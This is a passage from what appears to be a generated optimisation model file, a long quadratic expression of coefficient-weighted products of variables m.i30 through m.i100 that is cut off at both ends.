m.i30*m.i70 + 0.02153*m.i30*m.i71 + 0.023498*m.i30*m.i72 + 0.0217474*m.i30*m.i73 + 0.0363548*
m.i30*m.i74 + 0.0290864*m.i30*m.i75 + 0.01738014*m.i30*m.i76 + 0.0248066*m.i30*m.i77 + 0.01560782
*m.i30*m.i78 + 0.0735134*m.i30*m.i79 + 0.0216582*m.i30*m.i80 + 0.030706*m.i30*m.i81 + 0.00888388*
m.i30*m.i82 + 0.00819988*m.i30*m.i83 + 0.02421*m.i30*m.i84 + 0.01903928*m.i30*m.i85 + 0.0384208*
m.i30*m.i86 + 0.0308632*m.i30*m.i87 + 0.112101*m.i30*m.i88 + 0.0313082*m.i30*m.i89 + 0.0480838*
m.i30*m.i90 + 0.0265036*m.i30*m.i91 + 0.0219052*m.i30*m.i92 + 0.01243318*m.i30*m.i93 + 0.00866336
*m.i30*m.i94 + 0.0318698*m.i30*m.i95 + 0.0809696*m.i30*m.i96 + 0.0362056*m.i30*m.i97 + 0.0307602*
m.i30*m.i98 + 0.0452826*m.i30*m.i99 + 0.0359652*m.i30*m.i100 + 0.01352968*m.i31*m.i32 +
0.01461656*m.i31*m.i33 + 0.00410226*m.i31*m.i34 + 0.00308616*m.i31*m.i35 + 0.0221942*m.i31*m.i36
+ 0.0095014*m.i31*m.i37 + 0.0001894118*m.i31*m.i38 + 0.01328104*m.i31*m.i39 + 0.0207254*m.i31*
m.i40 + 0.01363894*m.i31*m.i41 + 0.01129202*m.i31*m.i42 + 0.0108266*m.i31*m.i43 + 0.01097008*
m.i31*m.i44 + 0.00461712*m.i31*m.i45 + 0.00463752*m.i31*m.i46 + 0.00929264*m.i31*m.i47 +
0.00473752*m.i31*m.i48 + 0.0114599*m.i31*m.i49 + 0.0117742*m.i31*m.i50 + 0.0088573*m.i31*m.i51 +
0.0075837*m.i31*m.i52 + 0.00658756*m.i31*m.i53 + 0.0113218*m.i31*m.i54 + 0.00930362*m.i31*m.i55
+ 0.01063604*m.i31*m.i56 + 0.00432704*m.i31*m.i57 + 0.00804616*m.i31*m.i58 + 0.01180986*m.i31*
m.i59 + 0.0009047*m.i31*m.i60 + 0.01200762*m.i31*m.i61 + 0.00940268*m.i31*m.i62 + 0.01417994*
m.i31*m.i63 + 0.0076164*m.i31*m.i64 + 0.00575322*m.i31*m.i65 + 0.00834872*m.i31*m.i66 +
0.00454676*m.i31*m.i67 + 0.00544346*m.i31*m.i68 + 0.0132866*m.i31*m.i69 + 0.00553084*m.i31*m.i70
+ 0.01147094*m.i31*m.i71 + 0.00577578*m.i31*m.i72 + 0.00887008*m.i31*m.i73 + 0.01059428*m.i31*
m.i74 + 0.0040723*m.i31*m.i75 + 0.00207936*m.i31*m.i76 + 0.01175316*m.i31*m.i77 + 0.00278464*
m.i31*m.i78 + 0.00880162*m.i31*m.i79 + 0.0087823*m.i31*m.i80 + 0.00669872*m.i31*m.i81 +
0.001695732*m.i31*m.i82 + 0.01128974*m.i31*m.i83 + 0.0131319*m.i31*m.i84 + 0.00861518*m.i31*m.i85
+ 0.01080682*m.i31*m.i86 + 0.00523332*m.i31*m.i87 + 0.0207656*m.i31*m.i88 + 0.00591302*m.i31*
m.i89 + 0.00439716*m.i31*m.i90 + 0.0115743*m.i31*m.i91 + 0.00995262*m.i31*m.i92 + 0.000428388*
m.i31*m.i93 + 0.00464012*m.i31*m.i94 + 0.00813868*m.i31*m.i95 + 0.00570582*m.i31*m.i96 +
0.00954936*m.i31*m.i97 + 0.01038358*m.i31*m.i98 + 0.00920842*m.i31*m.i99 + 0.01146966*m.i31*
m.i100 + 0.0209668*m.i32*m.i33 + 0.0108011*m.i32*m.i34 + 0.01248282*m.i32*m.i35 + 0.0530038*m.i32
*m.i36 + 0.0301486*m.i32*m.i37 + 0.00760388*m.i32*m.i38 + 0.0317898*m.i32*m.i39 + 0.0642986*m.i32
*m.i40 + 0.0332684*m.i32*m.i41 + 0.0235182*m.i32*m.i42 + 0.0143552*m.i32*m.i43 + 0.0235288*m.i32*
m.i44 + 0.00682838*m.i32*m.i45 + 0.01137478*m.i32*m.i46 + 0.0318282*m.i32*m.i47 + 0.00984204*
m.i32*m.i48 + 0.0207836*m.i32*m.i49 + 0.0371082*m.i32*m.i50 + 0.01715818*m.i32*m.i51 + 0.0184894*
m.i32*m.i52 + 0.0241264*m.i32*m.i53 + 0.0254814*m.i32*m.i54 + 0.01913224*m.i32*m.i55 + 0.0212986*
m.i32*m.i56 + 0.01167336*m.i32*m.i57 + 0.01191892*m.i32*m.i58 + 0.0246844*m.i32*m.i59 +
0.00772776*m.i32*m.i60 + 0.0424102*m.i32*m.i61 + 0.0330624*m.i32*m.i62 + 0.0190237*m.i32*m.i63 +
0.01185726*m.i32*m.i64 + 0.01593976*m.i32*m.i65 + 0.00931156*m.i32*m.i66 + 0.01976096*m.i32*m.i67
+ 0.00940704*m.i32*m.i68 + 0.0353824*m.i32*m.i69 + 0.01637874*m.i32*m.i70 + 0.0234414*m.i32*
m.i71 + 0.01981882*m.i32*m.i72 + 0.01518934*m.i32*m.i73 + 0.0206944*m.i32*m.i74 + 0.01368518*
m.i32*m.i75 + 0.01085922*m.i32*m.i76 + 0.0142422*m.i32*m.i77 + 0.01225292*m.i32*m.i78 + 0.025216*
m.i32*m.i79 + 0.01581384*m.i32*m.i80 + 0.0226748*m.i32*m.i81 + 0.0078489*m.i32*m.i82 + 0.00488232
*m.i32*m.i83 + 0.01715432*m.i32*m.i84 + 0.01617784*m.i32*m.i85 + 0.0224728*m.i32*m.i86 +
0.0213528*m.i32*m.i87 + 0.0404024*m.i32*m.i88 + 0.00700416*m.i32*m.i89 + 0.0284686*m.i32*m.i90 +
0.01764584*m.i32*m.i91 + 0.01747106*m.i32*m.i92 + 0.00781272*m.i32*m.i93 + 0.01173676*m.i32*m.i94
+ 0.01901852*m.i32*m.i95 + 0.032411*m.i32*m.i96 + 0.0238232*m.i32*m.i97 + 0.021198*m.i32*m.i98
+ 0.0300116*m.i32*m.i99 + 0.0354006*m.i32*m.i100 + 0.0090127*m.i33*m.i34 + 0.00772724*m.i33*
m.i35 + 0.0313702*m.i33*m.i36 + 0.01413346*m.i33*m.i37 + 0.001835906*m.i33*m.i38 + 0.01789618*
m.i33*m.i39 + 0.0342932*m.i33*m.i40 + 0.0203234*m.i33*m.i41 + 0.01859662*m.i33*m.i42 + 0.00949822
*m.i33*m.i43 + 0.0173394*m.i33*m.i44 + 0.00462026*m.i33*m.i45 + 0.0076766*m.i33*m.i46 + 0.0195887
*m.i33*m.i47 + 0.00677792*m.i33*m.i48 + 0.01593666*m.i33*m.i49 + 0.0205366*m.i33*m.i50 +
0.01028686*m.i33*m.i51 + 0.01380638*m.i33*m.i52 + 0.0139701*m.i33*m.i53 + 0.016589*m.i33*m.i54 +
0.0139115*m.i33*m.i55 + 0.01339328*m.i33*m.i56 + 0.00706492*m.i33*m.i57 + 0.01010916*m.i33*m.i58
+ 0.0112109*m.i33*m.i59 + 0.0038394*m.i33*m.i60 + 0.0232104*m.i33*m.i61 + 0.01960694*m.i33*m.i62
+ 0.01805454*m.i33*m.i63 + 0.01327968*m.i33*m.i64 + 0.0135282*m.i33*m.i65 + 0.0101248*m.i33*
m.i66 + 0.00800254*m.i33*m.i67 + 0.0030849*m.i33*m.i68 + 0.0205056*m.i33*m.i69 + 0.00997944*m.i33
*m.i70 + 0.01867754*m.i33*m.i71 + 0.01023414*m.i33*m.i72 + 0.01414764*m.i33*m.i73 + 0.01623304*
m.i33*m.i74 + 0.00580254*m.i33*m.i75 + 0.00688906*m.i33*m.i76 + 0.01955742*m.i33*m.i77 +
0.0043617*m.i33*m.i78 + 0.0110714*m.i33*m.i79 + 0.00837212*m.i33*m.i80 + 0.0186224*m.i33*m.i81 +
0.0038599*m.i33*m.i82 + 0.01828456*m.i33*m.i83 + 0.01460176*m.i33*m.i84 + 0.00984126*m.i33*m.i85
+ 0.01375926*m.i33*m.i86 + 0.01081848*m.i33*m.i87 + 0.0294078*m.i33*m.i88 + 0.00904426*m.i33*
m.i89 + 0.01335384*m.i33*m.i90 + 0.00944562*m.i33*m.i91 + 0.01586856*m.i33*m.i92 + 0.00253356*
m.i33*m.i93 + 0.00579828*m.i33*m.i94 + 0.01264366*m.i33*m.i95 + 0.0212436*m.i33*m.i96 + 0.014968*
m.i33*m.i97 + 0.01459146*m.i33*m.i98 + 0.01990882*m.i33*m.i99 + 0.020898*m.i33*m.i100 + 0.0078456
*m.i34*m.i35 + 0.01102212*m.i34*m.i36 + 0.00676724*m.i34*m.i37 + 0.00365266*m.i34*m.i38 +
0.00595098*m.i34*m.i39 + 0.01153866*m.i34*m.i40 + 0.01058304*m.i34*m.i41 + 0.00838326*m.i34*m.i42
+ 0.00601354*m.i34*m.i43 + 0.00621002*m.i34*m.i44 + 0.00388646*m.i34*m.i45 + 0.00291464*m.i34*
m.i46 + 0.01279302*m.i34*m.i47 + 0.001590652*m.i34*m.i48 + 0.00546164*m.i34*m.i49 + 0.00756668*
m.i34*m.i50 + 0.00255946*m.i34*m.i51 + 0.00586752*m.i34*m.i52 - 0.0001086844*m.i34*m.i53 +
0.00756758*m.i34*m.i54 + 0.00472132*m.i34*m.i55 + 0.0090114*m.i34*m.i56 + 0.00404276*m.i34*m.i57
+ 0.00259172*m.i34*m.i58 + 0.0043188*m.i34*m.i59 + 0.00265148*m.i34*m.i60 + 0.00988174*m.i34*
m.i61 + 0.00773706*m.i34*m.i62 + 0.00871216*m.i34*m.i63 + 0.0051719*m.i34*m.i64 + 0.005674*m.i34*
m.i65 + 0.0042472*m.i34*m.i66 + 0.0029352*m.i34*m.i67 + 0.00380488*m.i34*m.i68 + 0.00782908*m.i34
*m.i69 + 0.00528678*m.i34*m.i70 + 0.01141144*m.i34*m.i71 + 0.00731358*m.i34*m.i72 + 0.00557996*
m.i34*m.i73 + 0.00428558*m.i34*m.i74 + 0.00214164*m.i34*m.i75 + 0.001888024*m.i34*m.i76 +
0.00450712*m.i34*m.i77 + 0.001974898*m.i34*m.i78 + 0.000555542*m.i34*m.i79 + 0.004826*m.i34*m.i80
+ 0.01009798*m.i34*m.i81 + 0.00342408*m.i34*m.i82 + 0.0066259*m.i34*m.i83 + 0.00557372*m.i34*
m.i84 + 0.00493326*m.i34*m.i85 + 0.0033431*m.i34*m.i86 + 0.00355798*m.i34*m.i87 + 0.0070914*m.i34
*m.i88 + 0.00319452*m.i34*m.i89 + 0.001165088*m.i34*m.i90 + 0.00330168*m.i34*m.i91 + 0.00487072*
m.i34*m.i92 + 0.001039364*m.i34*m.i93 + 0.00462638*m.i34*m.i94 + 0.00474964*m.i34*m.i95 +
0.00307738*m.i34*m.i96 + 0.00634158*m.i34*m.i97 + 0.0093911*m.i34*m.i98 + 0.00479968*m.i34*m.i99
+ 0.00945466*m.i34*m.i100 + 0.00886108*m.i35*m.i36 + 0.008324*m.i35*m.i37 + 0.0042517*m.i35*
m.i38 + 0.0063195*m.i35*m.i39 + 0.00897334*m.i35*m.i40 + 0.01438534*m.i35*m.i41 + 0.00707384*
m.i35*m.i42 + 0.00524994*m.i35*m.i43 + 0.00729354*m.i35*m.i44 + 0.00231104*m.i35*m.i45 +
0.00317018*m.i35*m.i46 + 0.01095322*m.i35*m.i47 + 0.00256082*m.i35*m.i48 + 0.0066693*m.i35*m.i49
+ 0.00896786*m.i35*m.i50 + 0.00243944*m.i35*m.i51 + 0.00542922*m.i35*m.i52 + 0.001853016*m.i35*
m.i53 + 0.0080304*m.i35*m.i54 + 0.004194*m.i35*m.i55 + 0.00944224*m.i35*m.i56 + 0.0044097*m.i35*
m.i57 + 0.00234874*m.i35*m.i58 + 0.0045055*m.i35*m.i59 + 0.00387194*m.i35*m.i60 + 0.01070194*
m.i35*m.i61 + 0.01020854*m.i35*m.i62 + 0.00869604*m.i35*m.i63 + 0.0038381*m.i35*m.i64 +
0.00566828*m.i35*m.i65 + 0.00392276*m.i35*m.i66 + 0.00493806*m.i35*m.i67 + 0.00543634*m.i35*m.i68
+ 0.01090284*m.i35*m.i69 + 0.00744802*m.i35*m.i70 + 0.01323476*m.i35*m.i71 + 0.00994186*m.i35*
m.i72 + 0.00554564*m.i35*m.i73 + 0.00631474*m.i35*m.i74 + 0.00456554*m.i35*m.i75 + 0.00357674*
m.i35*m.i76 + 0.00520436*m.i35*m.i77 + 0.0030095*m.i35*m.i78 + 0.0057729*m.i35*m.i79 + 0.00411204
*m.i35*m.i80 + 0.00953392*m.i35*m.i81 + 0.00378046*m.i35*m.i82 + 0.00572152*m.i35*m.i83 +
0.00613732*m.i35*m.i84 + 0.00382166*m.i35*m.i85 + 0.00356476*m.i35*m.i86 + 0.00634394*m.i35*m.i87
+ 0.0111758*m.i35*m.i88 + 0.00567884*m.i35*m.i89 + 0.00368822*m.i35*m.i90 + 0.00382434*m.i35*
m.i91 + 0.00295216*m.i35*m.i92 + 0.00261056*m.i35*m.i93 + 0.00538486*m.i35*m.i94 + 0.00508518*
m.i35*m.i95 + 0.00571674*m.i35*m.i96 + 0.00749186*m.i35*m.i97 + 0.00986618*m.i35*m.i98 +
0.00565378*m.i35*m.i99 + 0.0094721*m.i35*m.i100 + 0.0440606*m.i36*m.i37 + 0.0069763*m.i36*m.i38
+ 0.0493166*m.i36*m.i39 + 0.121634*m.i36*m.i40 + 0.0358136*m.i36*m.i41 + 0.0380066*m.i36*m.i42
+ 0.0240066*m.i36*m.i43 + 0.0315302*m.i36*m.i44 + 0.00778714*m.i36*m.i45 + 0.01711478*m.i36*
m.i46 + 0.0433014*m.i36*m.i47 + 0.01592312*m.i36*m.i48 + 0.0219624*m.i36*m.i49 + 0.0584382*m.i36*
m.i50 + 0.0237454*m.i36*m.i51 + 0.030079*m.i36*m.i52 + 0.0450814*m.i36*m.i53 + 0.0285826*m.i36*
m.i54 + 0.0266392*m.i36*m.i55 + 0.01830758*m.i36*m.i56 + 0.01364522*m.i36*m.i57 + 0.01568*m.i36*
m.i58 + 0.0359108*m.i36*m.i59 + 0.00643528*m.i36*m.i60 + 0.056249*m.i36*m.i61 + 0.0503568*m.i36*
m.i62 + 0.0221574*m.i36*m.i63 + 0.023432*m.i36*m.i64 + 0.0219264*m.i36*m.i65 + 0.01946022*m.i36*
m.i66 + 0.0301552*m.i36*m.i67 + 0.00986666*m.i36*m.i68 + 0.0496472*m.i36*m.i69 + 0.0177644*m.i36*
m.i70 + 0.0308856*m.i36*m.i71 + 0.01899074*m.i36*m.i72 + 0.01805938*m.i36*m.i73 + 0.0273694*m.i36
*m.i74 + 0.01662774*m.i36*m.i75 + 0.00832596*m.i36*m.i76 + 0.0203852*m.i36*m.i77 + 0.0174271*
m.i36*m.i78 + 0.039217*m.i36*m.i79 + 0.0232082*m.i36*m.i80 + 0.0357644*m.i36*m.i81 + 0.00331724*
m.i36*m.i82 + 0.0276304*m.i36*m.i83 + 0.0267904*m.i36*m.i84 + 0.02756*m.i36*m.i85 + 0.0320374*
m.i36*m.i86 + 0.0222598*m.i36*m.i87 + 0.0496644*m.i36*m.i88 + 0.01118028*m.i36*m.i89 + 0.0432572*
m.i36*m.i90 + 0.027434*m.i36*m.i91 + 0.0293774*m.i36*m.i92 + 0.0055352*m.i36*m.i93 + 0.00852418*
m.i36*m.i94 + 0.028037*m.i36*m.i95 + 0.0642512*m.i36*m.i96 + 0.0386458*m.i36*m.i97 + 0.040981*
m.i36*m.i98 + 0.04604*m.i36*m.i99 + 0.0478424*m.i36*m.i100 + 0.00525362*m.i37*m.i38 + 0.0212576*
m.i37*m.i39 + 0.0543916*m.i37*m.i40 + 0.018282*m.i37*m.i41 + 0.01700698*m.i37*m.i42 + 0.00953368*
m.i37*m.i43 + 0.0147155*m.i37*m.i44 + 0.00425042*m.i37*m.i45 + 0.00777022*m.i37*m.i46 +
0.01646346*m.i37*m.i47 + 0.00740598*m.i37*m.i48 + 0.01274586*m.i37*m.i49 + 0.0282742*m.i37*m.i50
+ 0.01506898*m.i37*m.i51 + 0.01409464*m.i37*m.i52 + 0.01916222*m.i37*m.i53 + 0.01572296*m.i37*
m.i54 + 0.01361714*m.i37*m.i55 + 0.01302042*m.i37*m.i56 + 0.00807862*m.i37*m.i57 + 0.00701644*
m.i37*m.i58 + 0.0201438*m.i37*m.i59 + 0.00497496*m.i37*m.i60 + 0.0259544*m.i37*m.i61 + 0.01982096
*m.i37*m.i62 + 0.01082904*m.i37*m.i63 + 0.00909066*m.i37*m.i64 + 0.0112364*m.i37*m.i65 +
0.0089483*m.i37*m.i66 + 0.01522148*m.i37*m.i67 + 0.00459152*m.i37*m.i68 + 0.0214858*m.i37*m.i69
+ 0.01075074*m.i37*m.i70 + 0.0132224*m.i37*m.i71 + 0.00980738*m.i37*m.i72 + 0.00885252*m.i37*
m.i73 + 0.01427422*m.i37*m.i74 + 0.00903996*m.i37*m.i75 + 0.00768272*m.i37*m.i76 + 0.0103221*
m.i37*m.i77 + 0.01082002*m.i37*m.i78 + 0.0248284*m.i37*m.i79 + 0.01098172*m.i37*m.i80 +
0.01335848*m.i37*m.i81 + 0.00545734*m.i37*m.i82 + 0.00921544*m.i37*m.i83 + 0.0110069*m.i37*m.i84
+ 0.01385998*m.i37*m.i85 + 0.01437348*m.i37*m.i86 + 0.01621552*m.i37*m.i87 + 0.01981332*m.i37*
m.i88 + 0.00549314*m.i37*m.i89 + 0.0210958*m.i37*m.i90 + 0.0116061*m.i37*m.i91 + 0.01444326*m.i37
*m.i92 + 0.00631646*m.i37*m.i93 + 0.00847398*m.i37*m.i94 + 0.0132838*m.i37*m.i95 + 0.0257442*
m.i37*m.i96 + 0.01746728*m.i37*m.i97 + 0.01331586*m.i37*m.i98 + 0.0246618*m.i37*m.i99 + 0.0231186
*m.i37*m.i100 + 0.00427726*m.i38*m.i39 + 0.00960742*m.i38*m.i40 + 0.00588794*m.i38*m.i41 +
0.0040899*m.i38*m.i42 + 0.00370486*m.i38*m.i43 + 0.001581616*m.i38*m.i44 + 0.00157779*m.i38*m.i45
+ 0.001517842*m.i38*m.i46 + 0.00577098*m.i38*m.i47 + 0.00184948*m.i38*m.i48 + 0.001412132*m.i38*
m.i49 + 0.00473326*m.i38*m.i50 + 0.001265572*m.i38*m.i51 + 0.00389392*m.i38*m.i52 + 0.00195541*
m.i38*m.i53 + 0.0045747*m.i38*m.i54 + 0.003024*m.i38*m.i55 + 0.00322834*m.i38*m.i56 + 0.00240162*
m.i38*m.i57 + 0.000494648*m.i38*m.i58 + 0.0035117*m.i38*m.i59 + 0.00302272*m.i38*m.i60 +
0.0067192*m.i38*m.i61 + 0.00576934*m.i38*m.i62 + 0.00236514*m.i38*m.i63 + 0.00208302*m.i38*m.i64
+ 0.00359594*m.i38*m.i65 + 0.001590092*m.i38*m.i66 + 0.00239398*m.i38*m.i67 + 0.00302224*m.i38*
m.i68 + 0.00326928*m.i38*m.i69 + 0.00302294*m.i38*m.i70 + 0.0049377*m.i38*m.i71 + 0.00553496*
m.i38*m.i72 + 0.00229972*m.i38*m.i73 + 0.00318332*m.i38*m.i74 + 0.00325074*m.i38*m.i75 +
0.001803886*m.i38*m.i76 + 0.000902562*m.i38*m.i77 + 0.001651326*m.i38*m.i78 + 0.0039935*m.i38*
m.i79 + 0.00233242*m.i38*m.i80 + 0.00546644*m.i38*m.i81 + 0.00223454*m.i38*m.i82 - 0.001681894*
m.i38*m.i83 + 0.0025273*m.i38*m.i84 + 0.0032781*m.i38*m.i85 + 0.001557044*m.i38*m.i86 +
0.00327138*m.i38*m.i87 + 0.00674346*m.i38*m.i88 + 0.0020784*m.i38*m.i89 + 0.00343958*m.i38*m.i90
+ 0.00324954*m.i38*m.i91 + 0.00206404*m.i38*m.i92 + 0.00161462*m.i38*m.i93 + 0.00247166*m.i38*
m.i94 + 0.00341238*m.i38*m.i95 + 0.00585902*m.i38*m.i96 + 0.00423638*m.i38*m.i97 + 0.00566634*
m.i38*m.i98 + 0.00315378*m.i38*m.i99 + 0.00449598*m.i38*m.i100 + 0.0491892*m.i39*m.i40 +
0.0262408*m.i39*m.i41 + 0.0205234*m.i39*m.i42 + 0.01409356*m.i39*m.i43 + 0.0195666*m.i39*m.i44 +
0.00525174*m.i39*m.i45 + 0.01076856*m.i39*m.i46 + 0.0216478*m.i39*m.i47 + 0.01097136*m.i39*m.i48
+ 0.0178672*m.i39*m.i49 + 0.0324104*m.i39*m.i50 + 0.0147971*m.i39*m.i51 + 0.01855664*m.i39*m.i52
+ 0.0250992*m.i39*m.i53 + 0.0213078*m.i39*m.i54 + 0.01575182*m.i39*m.i55 + 0.01438592*m.i39*
m.i56 + 0.0105253*m.i39*m.i57 + 0.01177712*m.i39*m.i58 + 0.0207946*m.i39*m.i59 + 0.00650454*m.i39
*m.i60 + 0.036126*m.i39*m.i61 + 0.0278076*m.i39*m.i62 + 0.0206546*m.i39*m.i63 + 0.01499036*m.i39*
m.i64 + 0.01276412*m.i39*m.i65 + 0.0125414*m.i39*m.i66 + 0.01617824*m.i39*m.i67 + 0.010394*m.i39*
m.i68 + 0.0290228*m.i39*m.i69 + 0.01190924*m.i39*m.i70 + 0.01824964*m.i39*m.i71 + 0.014012*m.i39*
m.i72 + 0.01408568*m.i39*m.i73 + 0.0192582*m.i39*m.i74 + 0.01283914*m.i39*m.i75 + 0.00757714*
m.i39*m.i76 + 0.0157748*m.i39*m.i77 + 0.00886562*m.i39*m.i78 + 0.0226622*m.i39*m.i79 + 0.01506442
*m.i39*m.i80 + 0.01868878*m.i39*m.i81 + 0.00371016*m.i39*m.i82 + 0.01245306*m.i39*m.i83 +
0.01693888*m.i39*m.i84 + 0.0145704*m.i39*m.i85 + 0.0207926*m.i39*m.i86 + 0.01487822*m.i39*m.i87
+ 0.0465058*m.i39*m.i88 + 0.01052428*m.i39*m.i89 + 0.0220072*m.i39*m.i90 + 0.01887928*m.i39*
m.i91 + 0.01597714*m.i39*m.i92 + 0.00531126*m.i39*m.i93 + 0.00658506*m.i39*m.i94 + 0.01713092*
m.i39*m.i95 + 0.0328166*m.i39*m.i96 + 0.0213542*m.i39*m.i97 + 0.0210286*m.i39*m.i98 + 0.0255336*
m.i39*m.i99 + 0.0274274*m.i39*m.i100 + 0.0504412*m.i40*m.i41 + 0.0336102*m.i40*m.i42 + 0.0294804*
m.i40*m.i43 + 0.0424704*m.i40*m.i44 + 0.0030095*m.i40*m.i45 + 0.01146224*m.i40*m.i46 + 0.0507426*
m.i40*m.i47 + 0.01585054*m.i40*m.i48 + 0.0217164*m.i40*m.i49 + 0.0491478*m.i40*m.i50 + 0.0317926*
m.i40*m.i51 + 0.0284682*m.i40*m.i52 + 0.0468934*m.i40*m.i53 + 0.0309254*m.i40*m.i54 + 0.028626*
m.i40*m.i55 + 0.0309698*m.i40*m.i56 + 0.01062184*m.i40*m.i57 + 0.01987174*m.i40*m.i58 + 0.0429952
*m.i40*m.i59 + 0.00300922*m.i40*m.i60 + 0.0574936*m.i40*m.i61 + 0.0496304*m.i40*m.i62 +
0.01678646*m.i40*m.i63 + 0.0153295*m.i40*m.i64 + 0.0230176*m.i40*m.i65 + 0.0200972*m.i40*m.i66 +
0.0274442*m.i40*m.i67 - 0.00465404*m.i40*m.i68 + 0.0404524*m.i40*m.i69 + 0.01243058*m.i40*m.i70
+ 0.0333654*m.i40*m.i71 + 0.01847532*m.i40*m.i72 + 0.01863464*m.i40*m.i73 + 0.01865328*m.i40*
m.i74 + 0.0086314*m.i40*m.i75 + 0.0107773*m.i40*m.i76 + 0.0203618*m.i40*m.i77 + 0.01445046*m.i40*
m.i78 + 0.0410886*m.i40*m.i79 + 0.01194082*m.i40*m.i80 + 0.044529*m.i40*m.i81 + 0.00528742*m.i40*
m.i82 + 0.0445722*m.i40*m.i83 + 0.0229102*m.i40*m.i84 + 0.0241064*m.i40*m.i85 + 0.0368384*m.i40*
m.i86 + 0.0327072*m.i40*m.i87 + 0.0612044*m.i40*m.i88 + 0.0029601*m.i40*m.i89 + 0.0534994*m.i40*
m.i90 + 0.0258428*m.i40*m.i91 + 0.0317582*m.i40*m.i92 + 0.00965728*m.i40*m.i93 + 0.01437522*m.i40
*m.i94 + 0.0249652*m.i40*m.i95 + 0.0605768*m.i40*m.i96 + 0.0345084*m.i40*m.i97 + 0.0313726*m.i40*
m.i98 + 0.064674*m.i40*m.i99 + 0.0504464*m.i40*m.i100 + 0.0211266*m.i41*m.i42 + 0.0280268*m.i41*
m.i43 + 0.0396958*m.i41*m.i44 + 0.00245084*m.i41*m.i45 + 0.00955952*m.i41*m.i46 + 0.0396834*m.i41
*m.i47 + 0.0061862*m.i41*m.i48 + 0.02227*m.i41*m.i49 + 0.0217142*m.i41*m.i50 + 0.00978418*m.i41*
m.i51 + 0.01479238*m.i41*m.i52 + 0.016171*m.i41*m.i53 + 0.0243916*m.i41*m.i54 + 0.01422356*m.i41*
m.i55 + 0.0283342*m.i41*m.i56 + 0.00801394*m.i41*m.i57 + 0.01783044*m.i41*m.i58 + 0.01283818*
m.i41*m.i59 + 0.00500652*m.i41*m.i60 + 0.0289002*m.i41*m.i61 + 0.0313062*m.i41*m.i62 + 0.0372108*
m.i41*m.i63 + 0.0192516*m.i41*m.i64 + 0.0152555*m.i41*m.i65 + 0.01848886*m.i41*m.i66 + 0.01396382
*m.i41*m.i67 + 0.01323774*m.i41*m.i68 + 0.0319484*m.i41*m.i69 + 0.01505338*m.i41*m.i70 +
0.0464724*m.i41*m.i71 + 0.0275962*m.i41*m.i72 + 0.01531976*m.i41*m.i73 + 0.0159052*m.i41*m.i74 +
0.00897454*m.i41*m.i75 + 0.00931212*m.i41*m.i76 + 0.01958562*m.i41*m.i77 + 0.00344582*m.i41*m.i78
+ 0.00874906*m.i41*m.i79 + 0.01063594*m.i41*m.i80 + 0.02994*m.i41*m.i81 + 0.000668906*m.i41*
m.i82 + 0.0436128*m.i41*m.i83 + 0.0233408*m.i41*m.i84 + 0.00754018*m.i41*m.i85 + 0.01805636*m.i41
*m.i86 + 0.01281402*m.i41*m.i87 + 0.0523726*m.i41*m.i88 + 0.00844562*m.i41*m.i89 + 0.01302218*
m.i41*m.i90 + 0.01396562*m.i41*m.i91 + 0.01458222*m.i41*m.i92 + 0.0072903*m.i41*m.i93 +
0.00709746*m.i41*m.i94 + 0.01473562*m.i41*m.i95 + 0.01085782*m.i41*m.i96 + 0.021406*m.i41*m.i97
+ 0.0295828*m.i41*m.i98 + 0.01994264*m.i41*m.i99 + 0.0263314*m.i41*m.i100 + 0.01525376*m.i42*
m.i43 + 0.01763084*m.i42*m.i44 + 0.00749008*m.i42*m.i45 + 0.00916454*m.i42*m.i46 + 0.0235102*
m.i42*m.i47 + 0.00921988*m.i42*m.i48 + 0.01347394*m.i42*m.i49 + 0.0247352*m.i42*m.i50 +
0.01120346*m.i42*m.i51 + 0.01858118*m.i42*m.i52 + 0.01723882*m.i42*m.i53 + 0.0208142*m.i42*m.i54
+ 0.01360838*m.i42*m.i55 + 0.0118194*m.i42*m.i56 + 0.00860676*m.i42*m.i57 + 0.00935934*m.i42*
m.i58 + 0.01516418*m.i42*m.i59 + 0.0068076*m.i42*m.i60 + 0.028779*m.i42*m.i61 + 0.0258494*m.i42*
m.i62 + 0.0233604*m.i42*m.i63 + 0.01573382*m.i42*m.i64 + 0.01049188*m.i42*m.i65 + 0.00740748*
m.i42*m.i66 + 0.01082116*m.i42*m.i67 + 0.00777482*m.i42*m.i68 + 0.0240088*m.i42*m.i69 +
0.01102072*m.i42*m.i70 + 0.01820862*m.i42*m.i71 + 0.01298112*m.i42*m.i72 + 0.01234456*m.i42*m.i73
+ 0.0141652*m.i42*m.i74 + 0.00934936*m.i42*m.i75 + 0.00505832*m.i42*m.i76 + 0.01458566*m.i42*
m.i77 + 0.00728638*m.i42*m.i78 + 0.0099359*m.i42*m.i79 + 0.01486474*m.i42*m.i80 + 0.01668502*
m.i42*m.i81 + 0.00373442*m.i42*m.i82 + 0.01190258*m.i42*m.i83 + 0.01201006*m.i42*m.i84 +
0.0151776*m.i42*m.i85 + 0.0145938*m.i42*m.i86 + 0.00824462*m.i42*m.i87 + 0.0160982*m.i42*m.i88 +
0.006593*m.i42*m.i89 + 0.01418496*m.i42*m.i90 + 0.01803698*m.i42*m.i91 + 0.0159653*m.i42*m.i92 +
0.00291508*m.i42*m.i93 + 0.00538746*m.i42*m.i94 + 0.01644022*m.i42*m.i95 + 0.0250208*m.i42*m.i96
+ 0.018306*m.i42*m.i97 + 0.01797718*m.i42*m.i98 + 0.01649756*m.i42*m.i99 + 0.025412*m.i42*m.i100
+ 0.01762524*m.i43*m.i44 + 0.0026577*m.i43*m.i45 + 0.00500594*m.i43*m.i46 + 0.01987672*m.i43*
m.i47 + 0.00486026*m.i43*m.i48 + 0.01054502*m.i43*m.i49 + 0.00887754*m.i43*m.i50 + 0.00693606*
m.i43*m.i51 + 0.01006578*m.i43*m.i52 + 0.01002454*m.i43*m.i53 + 0.0138188*m.i43*m.i54 +
0.00975298*m.i43*m.i55 + 0.01686962*m.i43*m.i56 + 0.00490722*m.i43*m.i57 + 0.00949952*m.i43*m.i58
+ 0.01032096*m.i43*m.i59 + 0.00313858*m.i43*m.i60 + 0.01509816*m.i43*m.i61 + 0.0162044*m.i43*
m.i62 + 0.01875628*m.i43*m.i63 + 0.01240346*m.i43*m.i64 + 0.0085184*m.i43*m.i65 + 0.0097536*m.i43
*m.i66 + 0.00601436*m.i43*m.i67 + 0.0069333*m.i43*m.i68 + 0.01534648*m.i43*m.i69 + 0.00585324*
m.i43*m.i70 + 0.01833662*m.i43*m.i71 + 0.01219044*m.i43*m.i72 + 0.00997222*m.i43*m.i73 +
